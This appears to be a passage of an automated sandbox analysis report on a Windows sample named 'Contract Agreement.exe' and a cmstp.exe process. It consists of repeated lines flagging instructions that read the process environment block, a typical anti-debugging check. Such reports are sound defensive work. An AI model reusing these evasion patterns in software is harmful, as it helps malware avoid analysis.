          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ACD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A42397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AC23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AC23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AC23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AC3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ACFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ACFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
